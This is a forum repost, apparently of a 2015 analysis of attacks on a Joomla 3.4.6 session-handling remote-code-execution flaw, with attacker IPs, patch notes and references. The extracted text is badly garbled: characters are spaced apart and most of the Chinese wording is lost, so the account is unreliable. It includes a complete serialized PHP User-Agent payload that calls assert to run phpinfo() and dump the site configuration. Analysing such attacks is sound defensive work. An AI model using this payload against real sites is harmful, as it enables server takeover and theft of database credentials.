[9652] 2015-12-18_Joomla高危漏洞扫描事件分析

文档创建者:s7ckTeam
浏览次数:36
最后更新:2025-01-18
2015-12-18_Joomla高危漏洞扫描事件分析 J o o m l a   F r e e B u f   2 0 1 5 - 1 2 - 1 8 1 . 1 2 1 4 J o o m l a 3 . 4 . 6 s u c u r i J o o m l a 1 2 1 3 3 I P 使 J o o m l a 3 . 4 . 6 6 0 J o o m l a 1 2 1 5 2 3 3 0 4 9 0 0 0 6 0 0 2 . 1 2 1 3 I P   7 4 . 3 . 1 7 0 . 3 3   1 2 1 4 1 5 I P   1 4 6 . 0 . 7 2 . 8 3   1 9 4 . 2 8 . 1 7 4 . 1 0 6 1 2 1 5 s u c u r i 1 2 1 3 3 I P 1 2 1 5 j o o m l a 3 . 4 . 6 1 2 1 5 s e s s i o n P O C 3 . D i f f U s e r - A g e n t s e s s i o n l i b r a r i e s / j o o m l a / s e s s i o n / s e s s i o n . p h p   _ v a l i d a t e s e t U s e r - A g e n t
J o o m l a p h p s e s s i o n s e s s i o n s t o r a g e     线     s e r i a l i z e ( )   线 " | " n a m e | s e r i a l i z e e x p U s e r - A g e n t : U s e r - A g e n t :   } _ _ t e s t | O : 2 1 : " J D a t a b a s e D r i v e r M y s q l i " : 3 : { s : 2 : " f c " ; O : 1 7 : " J S i m p l e p i e F a c t o r y " : 0 : { } s : 2 1 : " d i s c o n n e c t H a n d l e r s " ; a : 1 : { i : 0 ; a : 2 : { i : 0 ; O : 9 : " S i m p l e P i e " : 5 : { s : 8 : " s a n i t i z e " ; O : 2 0 : " J D a t a b a s e D r i v e r M y s q l " : 0 : { } s : 8 : " f e e d _ u r l " ; s : 3 7 : p h p i n f o ( ) ; J F a c t o r y : : g e t C o n f i g ( ) ; e x i t ; " ; s : 1 9 : " c a c h e _ n a m e _ f u n c t i o n " ; s : 6 : " a s s e r t " ; s : 5 : " c a c h e " ; b : 1 ; s : 1 1 : " c a c h e _ c l a s s " ; O : 2 0 : " J D a t a b a s e D r i v e r M y s q l " : 0 : { } } i : 1 ; s : 4 : " i n i t " ; } } s : 1 3 : " c o n n e c t i o n " ; b : 1 ; } ð 访 U s e r - A g e n t 访 c o o k i e 4 . J o o m l a 3 . 4 . 6 1 2 1 5 5 . 广 J o o m l a 3 . 4 . 6
l i b r a r i e s j o o m l a s e s s i o n s e s s i o n . p h p 3 6 0 6 . F A Q J o o m l a J o o m l a C M S 使 P H P M y S Q L L i n u x   W i n d o w s M a c O S X 6 0 J o o m l a 1 1 0 0 0 4 9 0 0 0 6 2 7 3 . x 2 . x 7 . 1 1 7 8 1   6 5 2 2   3 6 2 2   3 4 7 4   2 4 2 7   2 4 2 3   1 7 5 1   1 3 9 2   1 2 3 2   1 0 4 9   O P P O 广 G L P 西 O 2 O ( )
I n t e l I E E E H o n d a U t a h A m t r a k C a s h S t a r 8 . h t t p s : / / b l o g . s u c u r i . n e t / 2 0 1 5 / 1 2 / r e m o t e - c o m m a n d - e x e c u t i o n - v u l n e r a b i l i t y - i n - j o o m l a . h t m l h t t p s : / / g i t h u b . c o m / 8 0 v u l / p h p c o d z / b l o b / m a s t e r / r e s e a r c h / p c h - 0 1 3 . m d h t t p s : / / g i t h u b . c o m / r a p i d 7 / m e t a s p l o i t - f r a m e w o r k / i s s u e s / 6 3 4 7 h t t p : / / p h p . n e t / s e s s i o n _ s e t _ s a v e _ h a n d l e r h t t p : / / p h p . n e t / m a n u a l / z h / s e s s i o n . c o n f i g u r a t i o n . p h p # i n i . s e s s i o n . s e r i a l i z e - h a n d l e r h t t p s : / / g i t h u b . c o m / j o o m l a / j o o m l a - c m s / c o m p a r e / 3 . 4 . 5 . . . 3 . 4 . 6 ? d i f f = s p l i t & n a m e = 3 . 4 . 6 h t t p : / / d r o p s . w o o y u n . o r g / p a p e r s / 1 1 3 3 0 * F r e e B u f F r e e B u f . C O M

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则